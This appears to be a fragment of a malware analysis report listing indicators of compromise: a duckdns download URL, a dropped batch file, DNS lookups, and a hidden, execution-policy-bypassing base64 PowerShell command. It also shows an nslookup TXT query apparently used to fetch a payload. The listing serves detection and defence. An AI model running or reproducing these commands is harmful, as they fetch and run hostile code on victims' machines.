Technical Information
- http://outside-agent.duckdns.org:42525/bp.txt
- %TEMP%\ixp000.tmp\account.bat
- 'ou######agent.duckdns.org':42525
- DNS ASK no####y-mailbox.com
- DNS ASK ou######agent.duckdns.org
- '<SYSTEM32>\cmd.exe' /c "account.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoExit -encodedCommand UABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBlAHgAZQBjAHUAdABpAG8AbgBwAG8AbABpAGMAeQAgAGIAeQBwAGEAcwBzACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAAcABvAHcAZQByAHMAaABlAGwAb...
- '<SYSTEM32>\nslookup.exe' -q=txt noreply-mailbox.com